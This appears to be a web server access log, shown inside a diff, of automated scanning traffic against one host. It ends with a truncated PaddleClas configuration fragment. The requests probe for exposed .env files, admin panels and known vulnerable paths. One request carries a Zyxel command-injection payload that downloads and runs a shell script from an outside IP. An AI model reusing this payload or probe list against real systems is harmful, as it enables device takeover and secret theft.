(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1045/1209] 188.137.43.235 () {32 vars in 465 bytes} [Sun Feb 13 03:16:36 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1046/1210] 101.132.102.65 () {34 vars in 427 bytes} [Sun Feb 13 04:35:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1047/1211] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 13 04:42:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1048/1212] 184.105.139.67 () {28 vars in 308 bytes} [Sun Feb 13 04:57:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1049/1213] 47.103.99.103 () {34 vars in 426 bytes} [Sun Feb 13 06:37:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 5/1214] 83.97.20.34 () {26 vars in 284 bytes} [Sun Feb 13 06:57:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1050/1215] 183.191.123.49 () {32 vars in 472 bytes} [Sun Feb 13 07:18:13 2022] GET http://www.baidu.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1051/1216] 183.191.123.49 () {32 vars in 466 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1052/1217] 183.191.123.49 () {32 vars in 478 bytes} [Sun Feb 13 07:18:20 2022] GET http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 13/1218] 183.191.123.49 () {32 vars in 478 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 14/1219] 183.191.123.49 () {22 vars in 275 bytes} [Sun Feb 13 07:18:20 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 13/1220] 183.191.123.49 () {32 vars in 487 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 82/1221] 183.191.123.49 () {32 vars in 472 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.boxun.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 38/1222] 183.191.123.49 () {32 vars in 469 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.bing.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 39/1223] 183.191.123.49 () {32 vars in 475 bytes} [Sun Feb 13 07:18:20 2022] GET http://www.123cha.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1053/1224] 198.199.113.192 () {34 vars in 423 bytes} [Sun Feb 13 08:29:11 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1054/1225] 192.241.205.238 () {34 vars in 425 bytes} [Sun Feb 13 08:52:20 2022] GET /actuator/health => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1055/1226] 167.94.138.47 () {28 vars in 310 bytes} [Sun Feb 13 09:34:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1056/1227] 167.94.138.47 () {34 vars in 442 bytes} [Sun Feb 13 09:34:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1057/1228] 193.118.53.210 () {34 vars in 488 bytes} [Sun Feb 13 09:34:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1058/1229] 196.3.62.14 () {32 vars in 461 bytes} [Sun Feb 13 10:47:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1059/1230] 175.178.104.30 () {36 vars in 670 bytes} [Sun Feb 13 11:08:23 2022] GET /phpmyadmin4.8.5/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1060/1231] 166.70.97.107 () {36 vars in 523 bytes} [Sun Feb 13 11:35:51 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 83/1232] 166.70.97.107 () {40 vars in 630 bytes} [Sun Feb 13 11:35:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1061/1233] 34.140.248.32 () {42 vars in 561 bytes} [Sun Feb 13 12:01:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1062/1234] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 13 12:58:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1063/1235] 128.14.209.162 () {34 vars in 488 bytes} [Sun Feb 13 16:38:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1064/1236] 135.180.146.73 () {30 vars in 437 bytes} [Sun Feb 13 16:40:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1065/1237] 116.233.200.101 () {26 vars in 299 bytes} [Sun Feb 13 16:59:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1066/1238] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1067/1239] 116.233.200.101 () {42 vars in 799 bytes} [Sun Feb 13 16:59:27 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1068/1240] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1069/1241] 116.233.200.101 () {30 vars in 371 bytes} [Sun Feb 13 16:59:28 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1070/1242] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1071/1243] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1072/1244] 116.233.200.101 () {30 vars in 341 bytes} [Sun Feb 13 16:59:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1073/1245] 116.233.200.101 () {30 vars in 424 bytes} [Sun Feb 13 16:59:28 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1074/1246] 116.233.200.101 () {30 vars in 365 bytes} [Sun Feb 13 16:59:28 2022] GET /KingViewWeb/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1075/1247] 116.233.200.101 () {30 vars in 367 bytes} [Sun Feb 13 16:59:29 2022] GET /ifixwebspace/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1076/1248] 116.233.200.101 () {30 vars in 367 bytes} [Sun Feb 13 16:59:29 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1077/1249] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 13 17:27:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1078/1250] 47.102.98.20 () {40 vars in 599 bytes} [Sun Feb 13 17:47:52 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1079/1251] 47.102.98.20 () {38 vars in 592 bytes} [Sun Feb 13 17:47:52 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1080/1252] 209.17.96.58 () {30 vars in 409 bytes} [Sun Feb 13 18:10:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1081/1253] 31.210.20.81 () {28 vars in 309 bytes} [Sun Feb 13 18:25:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1082/1254] 31.210.20.81 () {36 vars in 853 bytes} [Sun Feb 13 18:25:20 2022] GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bcd%20/tmp%3Brm%20wget.sh;wget%20http%3A//136.144.41.151/multi/wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20Exploit.Zyxel;+%23&password=asdf => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1083/1255] 138.204.57.68 () {32 vars in 463 bytes} [Sun Feb 13 18:55:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1084/1256] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 13 19:04:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1085/1257] 23.250.19.242 () {34 vars in 536 bytes} [Sun Feb 13 19:38:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 84/1258] 23.250.19.242 () {30 vars in 359 bytes} [Sun Feb 13 19:38:23 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1086/1259] 23.250.19.242 () {30 vars in 361 bytes} [Sun Feb 13 19:38:24 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 85/1260] 23.250.19.242 () {30 vars in 387 bytes} [Sun Feb 13 19:38:25 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1087/1261] 23.250.19.242 () {36 vars in 514 bytes} [Sun Feb 13 19:38:26 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1088/1262] 35.195.93.98 () {42 vars in 562 bytes} [Sun Feb 13 19:38:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1089/1263] 154.89.5.84 () {30 vars in 326 bytes} [Sun Feb 13 19:40:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1090/1264] 138.255.150.42 () {32 vars in 465 bytes} [Sun Feb 13 20:04:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1091/1265] 138.255.150.155 () {32 vars in 471 bytes} [Sun Feb 13 20:04:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1092/1266] 177.38.179.57 () {32 vars in 464 bytes} [Sun Feb 13 20:21:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1093/1267] 136.144.41.117 () {40 vars in 568 bytes} [Sun Feb 13 21:02:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1094/1268] 192.241.206.58 () {34 vars in 428 bytes} [Sun Feb 13 21:07:12 2022] GET /manager/text/list => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1095/1269] 185.67.218.159 () {32 vars in 471 bytes} [Sun Feb 13 21:17:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1096/1270] 39.100.36.160 () {34 vars in 459 bytes} [Sun Feb 13 22:32:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1097/1271] 107.189.10.196 () {28 vars in 311 bytes} [Sun Feb 13 22:34:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1098/1272] 107.189.10.196 () {40 vars in 672 bytes} [Sun Feb 13 22:34:34 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1099/1273] 83.97.20.34 () {30 vars in 328 bytes} [Sun Feb 13 22:56:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1100/1274] 109.237.103.9 () {36 vars in 523 bytes} [Sun Feb 13 23:38:42 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1101/1275] 192.241.205.55 () {34 vars in 418 bytes} [Mon Feb 14 00:05:30 2022] GET /manager/html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1102/1276] 192.241.211.58 () {34 vars in 394 bytes} [Mon Feb 14 00:18:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1103/1277] 103.207.42.130 () {36 vars in 590 bytes} [Mon Feb 14 00:31:40 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1104/1278] 103.207.42.130 () {40 vars in 697 bytes} [Mon Feb 14 00:31:41 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1105/1279] 103.207.42.130 () {36 vars in 590 bytes} [Mon Feb 14 00:34:32 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1106/1280] 103.207.42.130 () {40 vars in 697 bytes} [Mon Feb 14 00:34:34 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1107/1281] 83.97.20.34 () {26 vars in 287 bytes} [Mon Feb 14 00:59:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1108/1282] 103.207.42.130 () {36 vars in 590 bytes} [Mon Feb 14 01:09:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1109/1283] 103.207.42.130 () {40 vars in 697 bytes} [Mon Feb 14 01:09:48 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1110/1284] 223.70.167.234 () {36 vars in 521 bytes} [Mon Feb 14 03:01:44 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1111/1285] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:44 2022] GET /conf/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1112/1286] 223.70.167.234 () {36 vars in 543 bytes} [Mon Feb 14 03:01:44 2022] GET /wp-content/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 86/1287] 223.70.167.234 () {36 vars in 539 bytes} [Mon Feb 14 03:01:45 2022] GET /wp-admin/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 87/1288] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:45 2022] GET /library/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 40/1289] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:46 2022] GET /new/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 41/1290] 223.70.167.234 () {36 vars in 535 bytes} [Mon Feb 14 03:01:46 2022] GET /vendor/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 42/1291] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:46 2022] GET /old/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1113/1292] 223.70.167.234 () {36 vars in 533 bytes} [Mon Feb 14 03:01:47 2022] GET /local/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 15/1293] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:47 2022] GET /api/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 14/1294] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:48 2022] GET /blog/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 10/1295] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:48 2022] GET /crm/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 88/1296] 223.70.167.234 () {36 vars in 533 bytes} [Mon Feb 14 03:01:48 2022] GET /admin/.env => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 335 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 4/1297] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:49 2022] GET /laravel/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 5/1298] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:49 2022] GET /app/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1114/1299] 223.70.167.234 () {36 vars in 543 bytes} [Mon Feb 14 03:01:49 2022] GET /app/config/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 6/1300] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:50 2022] GET /apps/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1115/1301] 223.70.167.234 () {36 vars in 533 bytes} [Mon Feb 14 03:01:50 2022] GET /audio/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 7/1302] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:51 2022] GET /cgi-bin/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 16/1303] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:51 2022] GET /backend/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 43/1304] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:52 2022] GET /src/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 15/1305] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:53 2022] GET /base/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 16/1306] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:53 2022] GET /core/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1116/1307] 223.70.167.234 () {36 vars in 551 bytes} [Mon Feb 14 03:01:54 2022] GET /vendor/laravel/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1117/1308] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:54 2022] GET /storage/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1118/1309] 223.70.167.234 () {36 vars in 541 bytes} [Mon Feb 14 03:01:55 2022] GET /protected/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1119/1310] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:55 2022] GET /newsite/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1120/1311] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:55 2022] GET /www/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1121/1312] 223.70.167.234 () {36 vars in 581 bytes} [Mon Feb 14 03:01:56 2022] GET /sites/all/libraries/mailchimp/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1122/1313] 223.70.167.234 () {36 vars in 539 bytes} [Mon Feb 14 03:01:56 2022] GET /database/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1123/1314] 223.70.167.234 () {36 vars in 535 bytes} [Mon Feb 14 03:01:56 2022] GET /public/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1124/1315] 223.70.167.234 () {36 vars in 549 bytes} [Mon Feb 14 03:01:57 2022] GET /47.100.88.229/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1125/1316] 223.70.167.234 () {40 vars in 628 bytes} [Mon Feb 14 03:01:57 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 17/1317] 223.70.167.234 () {38 vars in 640 bytes} [Mon Feb 14 03:01:58 2022] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1126/1318] 2.58.149.136 () {40 vars in 566 bytes} [Mon Feb 14 03:14:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1127/1319] 20.55.53.144 () {34 vars in 495 bytes} [Mon Feb 14 03:50:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1128/1320] 83.97.20.34 () {30 vars in 329 bytes} [Mon Feb 14 04:30:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1129/1321] 103.203.56.1 () {34 vars in 388 bytes} [Mon Feb 14 05:07:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1130/1322] 109.235.7.228 () {32 vars in 470 bytes} [Mon Feb 14 05:32:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1131/1323] 128.14.134.134 () {34 vars in 488 bytes} [Mon Feb 14 05:36:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1132/1324] 173.249.10.27 () {30 vars in 340 bytes} [Mon Feb 14 06:13:38 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1133/1325] 173.249.10.27 () {30 vars in 339 bytes} [Mon Feb 14 06:13:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1134/1326] 83.97.20.34 () {26 vars in 287 bytes} [Mon Feb 14 06:59:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:39:50 INFO: +2022-02-14 08:24:44 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2555,78 +4744,61 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:39:50 INFO: DetPostProcess : -2021-11-03 04:39:50 INFO: DetPreProcess : -2021-11-03 04:39:50 INFO: transform_ops : -2021-11-03 04:39:50 INFO: DetResize : -2021-11-03 04:39:50 INFO: interp : 2 -2021-11-03 04:39:50 INFO: keep_ratio : False -2021-11-03 04:39:50 INFO: target_size : [640, 640] -2021-11-03 04:39:50 INFO: DetNormalizeImage : -2021-11-03 04:39:50 INFO: is_scale : True -2021-11-03 04:39:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:39:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:39:50 INFO: DetPermute : -2021-11-03 04:39:50 INFO: Global 